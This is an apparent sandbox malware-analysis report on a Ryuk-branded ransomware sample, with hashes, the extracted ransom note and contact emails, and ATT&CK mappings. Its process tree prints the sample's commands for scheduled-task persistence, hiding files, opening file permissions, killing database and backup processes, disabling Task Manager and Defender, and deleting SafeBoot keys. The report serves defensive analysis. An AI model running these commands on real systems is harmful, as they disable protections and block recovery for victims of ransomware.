Analysis

  • max time kernel
    151s
  • max time network
    112s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230221-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20230221-en locale:en-us os:windows10-2004-x64 system
  • submitted
    11-03-2023 01:49

General

  • Target

    788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe

  • Size

    767KB

  • MD5

    d2e194259106bca3b42dc8690d340b59

  • SHA1

    edcd63a3125854ed72cb5811f08644a87e265e3b

  • SHA256

    788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc

  • SHA512

    4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13

  • SSDEEP

    12288:RnBkozA9lzIeVJ+OeO+OeNhBBhhBBUA9CGkIDIP6J9kgnDC3TbqUttRrvCsZ+nt2:jkozAjK95DIP4DCDbq8tRrvB

Malware Config

Extracted

Path

C:\ProgramData\RyukReadMe.txt

Ransom Note
Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm. Backups were either encrypted Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. We exclusively have decryption software for your situation. More than a year ago, world experts recognized the impossibility of deciphering by any means except the original decoder. No decryption software is available in the public. Antiviruse companies, researchers, IT specialists, and no other persons cant help you decrypt the data. DO NOT RESET OR SHUTDOWN - files may be damaged. DO NOT DELETE readme files. To confirm our honest intentions.Send 2 different random files and you will get it decrypted. It can be from different computers on your network to be sure that one key decrypts everything. 2 files we unlock for free To get info (decrypt your files) contact us at Vulcanteam@CYBERFEAR.COM or vulcanteam@inboxhub.net You will receive btc address for payment in the reply letter Ryuk No system is safe
Emails

Vulcanteam@CYBERFEAR.COM

vulcanteam@inboxhub.net

Signatures

  • Ryuk

    Ransomware distributed via existing botnets, often Trickbot or Emotet.

  • Disables Task Manager via registry modification
  • Drops startup file 3 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
    "C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe"
    1⤵
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2124
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2360
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
        3⤵
        • Creates scheduled task(s)
        PID:2904
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
      2⤵
      • Drops startup file
      PID:1484
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
      2⤵
        PID:3396
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:716
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
          3⤵
          • Creates scheduled task(s)
          PID:4428
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:116
        • C:\Windows\SysWOW64\attrib.exe
          attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
          3⤵
          • Drops startup file
          • Views/modifies file attributes
          PID:4504
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe" /RU SYSTEM /RL HIGHEST /F
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1548
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe" /RU SYSTEM /RL HIGHEST /F
          3⤵
          • Creates scheduled task(s)
          PID:4312
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe" /F
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:792
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe" /F
          3⤵
          • Creates scheduled task(s)
          PID:4000
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3412
        • C:\Windows\SysWOW64\attrib.exe
          attrib +h +s ryuk.exe
          3⤵
          • Views/modifies file attributes
          PID:4580
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:5004
        • C:\Windows\SysWOW64\attrib.exe
          attrib +h +s C:\ProgramData\ryuk.exe
          3⤵
          • Views/modifies file attributes
          PID:4788
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4036
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
          3⤵
            PID:5072
            • C:\Windows\SysWOW64\icacls.exe
              icacls * /grant Everyone:(OI)(CI)F /T /C /Q
              4⤵
              • Modifies file permissions
              PID:3476
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4616
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c taskkill /t /f /im sql*
            3⤵
              PID:4308
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /t /f /im sql*
                4⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1428
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /t /im veeam*
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1792
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
            2⤵
              PID:3332
              • C:\Windows\SysWOW64\reg.exe
                reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
                3⤵
                  PID:1636
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1
                2⤵
                  PID:988
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2
                  2⤵
                    PID:1640
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID
                    2⤵
                      PID:1944
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1
                      2⤵
                        PID:1128
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "
                        2⤵
                          PID:5100
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                          2⤵
                            PID:708
                            • C:\Windows\SysWOW64\reg.exe
                              reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                              3⤵
                                PID:2932
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                              2⤵
                                PID:4604
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                  3⤵
                                    PID:3472
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
                                  2⤵
                                    PID:1536
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
                                      3⤵
                                        PID:1764
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
                                      2⤵
                                        PID:3876
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
                                          3⤵
                                            PID:444

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Execution
      Scheduled Task                  1   T1053

  • Persistence
      Scheduled Task                  1   T1053
      Hidden Files and Directories    1   T1158

  • Privilege Escalation
      Scheduled Task                  1   T1053

  • Defense Evasion
      File Permissions Modification   1   T1222
      Hidden Files and Directories    1   T1158

  • Discovery
      Query Registry                  1   T1012
      Peripheral Device Discovery     1   T1120
      System Information Discovery    2   T1082

                                      Downloads

                                      • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\RyukReadMe.html
                                        Filesize

                                        152B

                                      • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\RyukReadMe.txt
                                        Filesize

                                        1KB

                                      • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ryuk.exe
                                        Filesize

                                        767KB

                                      • C:\ProgramData\RYUKID
                                        Filesize

                                        8B

                                      • C:\ProgramData\RyukReadMe.txt
                                        Filesize

                                        1KB

                                      • C:\ProgramData\hrmlog1
                                        Filesize

                                        2KB

                                      • C:\ProgramData\hrmlog2
                                        Filesize

                                        292B

                                      • C:\ProgramData\ryuk.exe
                                        Filesize

                                        767KB

                                      • C:\Users\Admin\AppData\Local\Temp\RYUKID
                                        Filesize

                                        8B

                                      • C:\Users\Admin\AppData\Local\Temp\hrmlog1
                                        Filesize

                                        2KB

                                      • C:\Users\Admin\AppData\Local\Temp\hrmlog2
                                        Filesize

                                        292B

                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe
                                        Filesize

                                        767KB
